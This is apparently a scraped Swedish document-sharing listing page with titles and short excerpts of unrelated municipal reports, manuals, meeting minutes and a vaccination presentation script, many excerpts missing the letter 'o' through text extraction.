Manus till presentationen. Vaccination mot HPV. Version 2015-03-31 Manus till presentatinen Vaccinatin mt HPV Versin 2015-03-31 Bild 1. Vaccinatin mt HPV Den 1 januari 2010 infördes ett nytt vaccin i det svenska vaccinatinsprgrammet för barn. Flickr födda 1999 eller senare

Läs mer

Del 5: Rekommendationer och projektrapport

Del 5: Rekommendationer och projektrapport Arkiveringsrekmmendatiner Del 5: Rekmmendatiner ch prjektrapprt fi2 förvaltningsinfrmatin infrmatinsleveranser Prjektet Arkiveringsrekmmendatiner syftar till att ge en genmlysning av knsekvenser för dagens

Läs mer

Undersökning av seniorers informationsbehov Sundsvalls kommun

Undersökning av seniorers informationsbehov Sundsvalls kommun Undersökning av senirers infrmatinsbehv Sundsvalls kmmun Impera kmmunikatin AB Innehållsförteckning Inledning... 3 Syfte... 3 Metd ch genmförande... 3 Målgrupp ch Svarsfrekvens... 3 Brtfallsredvisning...

Läs mer

Vattenfall Innovation Awards

Vattenfall Innovation Awards Vattenfall Innvatin Awards Hantering av Uppfinnare, prcess ch tlkning av legala aspekter Tidsplan: 1. Vattenfalls (VF) utser en intern jury, bestående av ca 10 persner, sm bedömer ch beslutar m vilka idéer

Läs mer

Extra Nyhetsbrev från Kanslistöd

Extra Nyhetsbrev från Kanslistöd Extra Nyhetsbrev från Kanslistöd December månad 2008 Innehållsförteckning Arbetsflöden ch sammanfattande regelverk för kyrkbkföring... 2 Vårdnadshavarna ska vara ense m att barnet ska döpas... 2 Dpförrättaren...

Läs mer

ANVÄNDARMANUAL TEST OCH QUIZ för Mondo 2.0 Version 1

ANVÄNDARMANUAL TEST OCH QUIZ för Mondo 2.0 Version 1 ANVÄNDARMANUAL TEST OCH QUIZ för Mnd 2.0 Versin 1 Stckhlms universitet Avdelningen för IT ch media Oktber 2008 Innehållsförteckning Dkument Sida Test ch Quiz: En översikt 3 Sex nödvändiga steg för att

Läs mer

Att ta emot internationella gäster på Vilda

Att ta emot internationella gäster på Vilda Att ta emt internatinella gäster på Vilda Visst är det häftigt, att ni ska få skapa årets lägerupplevelse tillsammans med scuter från ett helt annat land? Att ha internatinella scutgäster är rligt, spännande

Läs mer

GEOSECMA for ArcGIS GSD datastruktur och import i en SDE geodatabas

GEOSECMA for ArcGIS GSD datastruktur och import i en SDE geodatabas GEOSECMA fr ArcGIS GSD datastruktur ch imprt i en SDE gedatabas ÖVERSIKT Det här dkumentet ger imprtinstruktiner ch en rekmmenderad struktur för Gegrafiska Sverige Data (GSD) i en SDE gedatabas sm ska

Läs mer

Leverantörsbetalningar

Leverantörsbetalningar Varje år betalar Sveriges 290 kmmuner felaktigt ut hundratals miljner krnr i egentliga eller felaktiga transaktiner. Med några enkla åtgärder skulle en str del av dessa kunna undvikas! Dkumentet avser

Läs mer

En kom i gång manual till SPF:s hemsidor

En kom i gång manual till SPF:s hemsidor En km i gång manual till SPF:s hemsidr Inlggning Meny (navigatinsträdet) Vad skall finnas på hemsidan Standarduppgifter [Startsidan, Om föreningen, Styrelsen, Kntakt, Bli medlem] Tilläggs/valfria uppgifter

Läs mer

Kravspecifikation Batchbeställningar 2008-03-25 Version:

Kravspecifikation Batchbeställningar 2008-03-25 Version: Kravspecifikatin Batchbeställningar 2008-03-25 Versin: 1.00 Ändringshistrik Revisin Datum Av Kmmentar 1.00 2008-03-25 Maria Valterssn Första versin efter prjektavslut. Kravspecifikatinen har bara funnits

Läs mer

Handikappersättningen

Handikappersättningen Hur mycket får man i Handikappersättningen är 36, 53 eller 69 prcent av prisbasbelppet~( berende på vilket behv du har av hjälp ch hur stra dina merkstnader är på grund av funktinsnedsättningen. Handikappersättning

Läs mer

Mötesanteckningar tredje mötet med Bredbandsforums Mandatgrupp

Mötesanteckningar tredje mötet med Bredbandsforums Mandatgrupp Datum: 2013-06-16 Rev: 2014-06-25 Mötesanteckningar tredje mötet med Bredbandsfrums Mandatgrupp Deltagare: Eva-Marie Marklund Christel Gustafssn Jakim Hlback Gabriella Uhrdin Mikael Sleman Åsa Möller Helena

Läs mer

Yttrande över Strategi för konkurrenskraft inom högprioriterade vårdområden

Yttrande över Strategi för konkurrenskraft inom högprioriterade vårdområden HSN 2010-10-19 p 11 1 (2) Häls- ch sjukvårdsnämndens förvaltning TJÄNSTEUTLÅTANDE 2010-09-30 HSN 1006-0574 Handläggare: Henrik Almkvist Yttrande över Strategi för knkurrenskraft inm högpririterade vårdmråden

Läs mer

att överlämna ärendet till socialnämnden utan eget ställningstagande.

att överlämna ärendet till socialnämnden utan eget ställningstagande. Scialnämndens arbetsutsktt Utdrag ur PROTOKOLL 2016-12-01 115 Revidering av lkala värdighetsgarantier för äldremsrgen SN-2016/250 Beslut Arbetsutskttet beslutar att överlämna ärendet till scialnämnden

Läs mer

Anvisning Registreringsteknik

Anvisning Registreringsteknik Anvisning Registreringsteknik För att den digitala pennan ska registrera krrekt, följ nedan anvisning: 1 Krk = av/på-knapp Krken fungerar sm en av/på-knapp på den digitala pennan. För att pennan ska fungera

Läs mer

Kommunikationsplan Miljö- och samhällsnytta 2011-2012 - Vi skapar ren välfärd

Kommunikationsplan Miljö- och samhällsnytta 2011-2012 - Vi skapar ren välfärd Kmmunikatinsplan Miljö- ch samhällsnytta 2011-2012 - Vi skapar ren välfärd Sammanfattning Avfall Sverige 1 planerar att genmföra en pininsbildande kampanj riktad mt samhällsintressenter på lika nivåer

Läs mer

Bildningsförvaltningens pedagogiska IKT-strategi för skolutveckling med hjälp av digitala verktyg 2013-2016

Bildningsförvaltningens pedagogiska IKT-strategi för skolutveckling med hjälp av digitala verktyg 2013-2016 Rapprt 1 (5) Datum 2013-06-03 Förslag till; Bildningsförvaltningens pedaggiska IKT-strategi för sklutveckling med hjälp av digitala verktyg 2013-2016 IT i sig kan inte förbättra elevernas lärande, däremt

Läs mer

Kvalitetsredovisning och verksamhetsplan för fritidshemmet Duvhöken, Sammilsdalskolan f-6

Kvalitetsredovisning och verksamhetsplan för fritidshemmet Duvhöken, Sammilsdalskolan f-6 Kvalitetsredvisning ch verksamhetsplan för fritidshemmet Duvhöken, Sammilsdalsklan f-6 Kvalitetsredvisning 2012/2013 Varje huvudman inm sklväsendet ska på huvudmannanivå systematiskt ch kntinuerligt planera,

Läs mer

Rekommendation att publicera datamängder som öppna data

Rekommendation att publicera datamängder som öppna data Tjänsteutlåtande Oöstei 4 ( Kmmunstyrelsens kntr Till Kmmunstyrelsen Datum 2015-04-27 Dnr KS 2015/0178 Rekmmendatin att publicera datamängder sm öppna data Beslutsförslag Kmmunstyrelsen föreslås besluta

Läs mer

Avfallsplan. för Piteå Kommun. Bilaga 2 Miljöbedömning inklusive miljökonsekvensbeskrivning. Antagen av kommunfullmäktige 2010-XX-XX

Avfallsplan. för Piteå Kommun. Bilaga 2 Miljöbedömning inklusive miljökonsekvensbeskrivning. Antagen av kommunfullmäktige 2010-XX-XX Avfallsplan för Piteå Kmmun 2010 2020 Bilaga 2 Miljöbedömning inklusive miljöknsekvensbeskrivning Antagen av kmmunfullmäktige 2010-XX-XX 1 Definitiner ch begrepp Miljöbedömning av planer ch prgram är den

Läs mer